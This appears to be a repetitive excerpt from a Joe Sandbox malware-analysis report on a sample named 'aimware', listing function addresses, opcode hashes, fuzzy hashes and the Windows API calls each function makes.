Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cbf56c435a22c211e4a3ed5ada21cf1604a544f2ae893262c7e47fb612fdb59d
Instruction ID: c3de728e6e5232b94bf160f2a269bf55cc781ea59b554ad3b3c75f722cb3264b
Opcode Fuzzy Hash: cbf56c435a22c211e4a3ed5ada21cf1604a544f2ae893262c7e47fb612fdb59d
Instruction Fuzzy Hash: 21F0B436525125F7DB219B22AD19FDF7758AB41760B1A8323B81A9B390CB30DD0182F0

Function 00AD3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00AD3C3F

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: e52a5fbdcb5f72a2b2dbffbc5a325f17132b27e3c9efb60212939fbc22501105
Instruction ID: e6d571e111711b201c61688ff6095ba93e439416f4610c2961c4abebbb81ca35
Opcode Fuzzy Hash: e52a5fbdcb5f72a2b2dbffbc5a325f17132b27e3c9efb60212939fbc22501105
Instruction Fuzzy Hash: C7F0E533211216AFCF118FA8EC0499A77A9EF45B617104526FA07E7290DB31EB24C791

Function 00AD8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00ADCA2C,00000000,?,00AD6CBE,?,00000008,?,00AD91E0,?,?,?), ref: 00AD8E38

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54563ce0e39d8c739111b8a1f2a5e946b5cd22ec09899307963d1672e63f7f91
Instruction ID: eba25d8ce1c052cc889ba00360ebf4b0c001e90751b62071edeee3dd54ebf910
Opcode Fuzzy Hash: 54563ce0e39d8c739111b8a1f2a5e946b5cd22ec09899307963d1672e63f7f91
Instruction Fuzzy Hash: C4E0ED312022259AEA7127699D08F9F7748EF41BA0F110223BC0B9B391CF28CC018AE0

Function 00AB5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB5AC2

Part of subcall function 00ABB505: __EH_prolog.LIBCMT ref: 00ABB50A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4117b2fb84dec728d7abc5d3b095585a0534efd4f78d0d775b08f637c46be830
Instruction ID: 09e4da37e29b381e46ed83d880c885b88edd5dab1465b3ed3ecf172122adb1bb
Opcode Fuzzy Hash: 4117b2fb84dec728d7abc5d3b095585a0534efd4f78d0d775b08f637c46be830
Instruction Fuzzy Hash: 81018C309106D0DAD725EBB8C241FEDFBA89F64304F51848DA45663283CBF41B08D7A2

Function 00ABA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00ABA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00ABA592,000000FF,?,?), ref: 00ABA6C4
Part of subcall function 00ABA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00ABA592,000000FF,?,?), ref: 00ABA6F2
Part of subcall function 00ABA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00ABA592,000000FF,?,?), ref: 00ABA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00ABA598

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: af04d307faf34deac695b50aeb3a661a3d69242f01e47f06cf6159089c7c461e
Instruction ID: d8c3351dd60bf141491eea43dfe47ccedb5142dbcc85f402b3456d3d84d5919f
Opcode Fuzzy Hash: af04d307faf34deac695b50aeb3a661a3d69242f01e47f06cf6159089c7c461e
Instruction Fuzzy Hash: 93F08232008790AACB3257B48A04BCB7B986F2A331F048B49F1FD521A7C27551999B33

Function 00AC0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00AC0E3D

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 5c14112c56b10488211e45e3a2eed27cc768703941c6417a17415d164cac1a4a
Instruction ID: 12de505497fe7943581879881af4e7e2a8faab2f8b09bdc4097f9907996dad24
Opcode Fuzzy Hash: 5c14112c56b10488211e45e3a2eed27cc768703941c6417a17415d164cac1a4a
Instruction Fuzzy Hash: 92D02B017010949ADF1173686A59FFF290A8FC7310F0F002DF1455B283CE680C83A261

Function 00ACA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00ACA62C

Part of subcall function 00ACA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00ACA3DA

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: a811884fc0d332ac6e0449bada347d47b787d82eb7e7ba10ba8ae1577897ebc8
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 12D0C77121020D76DF41AB619D12F7E7595EB10344F05C129B842D5151FEB1DD109556

Function 00ACE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00ACE5E3

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 6deaa9a93e1b079c4389de7f31fcd0d68aa5e4366bbd9409447cb9abbbc8173e
Instruction ID: bdffe649ef62c2303c0f3b55d5665e09944e30a35cf88769ebe77341004676f7
Opcode Fuzzy Hash: 6deaa9a93e1b079c4389de7f31fcd0d68aa5e4366bbd9409447cb9abbbc8173e
Instruction Fuzzy Hash: 8BD0A9B00802808AC601EBACAA82F853AA4F320704FC20828B2049B0A0CA7840908701

Function 00ACDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00AC1B3E), ref: 00ACDD92

Part of subcall function 00ACB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00ACB579
Part of subcall function 00ACB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ACB58A
Part of subcall function 00ACB568: IsDialogMessageW.USER32(00010470,?), ref: 00ACB59E
Part of subcall function 00ACB568: TranslateMessage.USER32(?), ref: 00ACB5AC
Part of subcall function 00ACB568: DispatchMessageW.USER32(?), ref: 00ACB5B6

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 9af66be52fd86da0803131f40ac202dd742d2810817f9e8ab8d9e66a48781d98
Instruction ID: b5cd231f2e64202f0933cf501d61a6069ae7a130986e58ec66aaffda05d62c6b
Opcode Fuzzy Hash: 9af66be52fd86da0803131f40ac202dd742d2810817f9e8ab8d9e66a48781d98
Instruction Fuzzy Hash: C5D09E75144300BAD6016B91CE06F1A7AE2AB98B05F404558B385750B1CA729D71DB11

Function 00AB98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00AB97BE), ref: 00AB98C8

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 2605b86cec76976033200064d44c4296cdc1ad5934f5279b7bd7359bcfc2049f
Instruction ID: 4b29c482428f8d8b1feb16c0c365f8cb97ac6bc9ea0ad306d00ede1d13654f35
Opcode Fuzzy Hash: 2605b86cec76976033200064d44c4296cdc1ad5934f5279b7bd7359bcfc2049f
Instruction Fuzzy Hash: 46C01235400105858E20876898480D67325AE533657B486D4C128890A2C322CC57EB00

Function 00ACE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f3f6af2ea7bcbdbcfbbf56293d33d9b747bf167423604abd1e6e4f26061a3a89
Instruction ID: 031b271dafd6a8753b2add91fea69e5acfbfae8de1be68606989dbc7289bf98f
Opcode Fuzzy Hash: f3f6af2ea7bcbdbcfbbf56293d33d9b747bf167423604abd1e6e4f26061a3a89
Instruction Fuzzy Hash: 80B012E629D140BC3104D14A1D02E3701ACD1C0F20331453EF805C4080E8807E910A31

Function 00ACE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5cb53dd58894a6d9fc0a67fd8241a875085b3f5fa9b5f5330d7db6f01b1ebf74
Instruction ID: 82f827f271dfd32cfdc23ee166e6a076d7eb272d8db59e29a720ddcc9299f98e
Opcode Fuzzy Hash: 5cb53dd58894a6d9fc0a67fd8241a875085b3f5fa9b5f5330d7db6f01b1ebf74
Instruction Fuzzy Hash: 72B012E2299040BC3504D6061D02E37019CC2C3F20331C63EFC05C4180E840BE550931

Function 00ACE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bb6122ff6085dadffe2a046ffe982bf179e0459daac802353a57c7bfb17953a0
Instruction ID: 8436f48e8f5084e341973782e9f2494e97746abeee6204fbdd611f05093470a2
Opcode Fuzzy Hash: bb6122ff6085dadffe2a046ffe982bf179e0459daac802353a57c7bfb17953a0
Instruction Fuzzy Hash: B2B012E6299140BC350491461D02D37015CC1C1F20331893EFC01D4480E880BE910831

Function 00ACE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61a824d410f1607285ad4f693314d652b5c13b86ef0b75ff03bce08fc62b5e7b
Instruction ID: 5a5af90c9452f08cf469d5ccdb2447baef76471bffd89ef302ee5c2b80e515e3
Opcode Fuzzy Hash: 61a824d410f1607285ad4f693314d652b5c13b86ef0b75ff03bce08fc62b5e7b
Instruction Fuzzy Hash: B9B012F22D9040BC3104D1061E02E3701ECC1C0F20331453EF805D4080EC407F520931

Function 00ACE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 16cd3c95d8df7f9a969e9651a3952a532f4e99e543ea5cb0d4a18059a14dce7d
Instruction ID: 55cd2a93b62bcf6d1e0674890827acf2db92193c8b848fb83a5c104f58344d66
Opcode Fuzzy Hash: 16cd3c95d8df7f9a969e9651a3952a532f4e99e543ea5cb0d4a18059a14dce7d
Instruction Fuzzy Hash: 7EB012F2299140BC3184D1061D02E37019CC1C0F20331463EFC05C4080E8407F910931

Function 00ACE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 694cab74c9baea92036486622886758111e6c4cdf757b34516725c04fb460549
Instruction ID: 2cc5b9b3007f6338f33cac4928bf8fe95f8e19548050a0cfbe6cc33ff0231c1c
Opcode Fuzzy Hash: 694cab74c9baea92036486622886758111e6c4cdf757b34516725c04fb460549
Instruction Fuzzy Hash: A3B012F2299040BC3144D1071D02E37019CD1C0F20331453EF805C4080E8407F510931

Function 00ACE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 89f4a1339f08d8a834916158087039eaa4d30e63b25a7a3c7f0eebf1582ec7b0
Instruction ID: 96983f117c2f7cf49c310fec8631eba0a385b47fece0161e893162e3add66b87
Opcode Fuzzy Hash: 89f4a1339f08d8a834916158087039eaa4d30e63b25a7a3c7f0eebf1582ec7b0
Instruction Fuzzy Hash: C1B012F22D9040BC3144D1061E02E37019CC1C0F20331453EF805D4080EC407F520931

Function 00ACE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

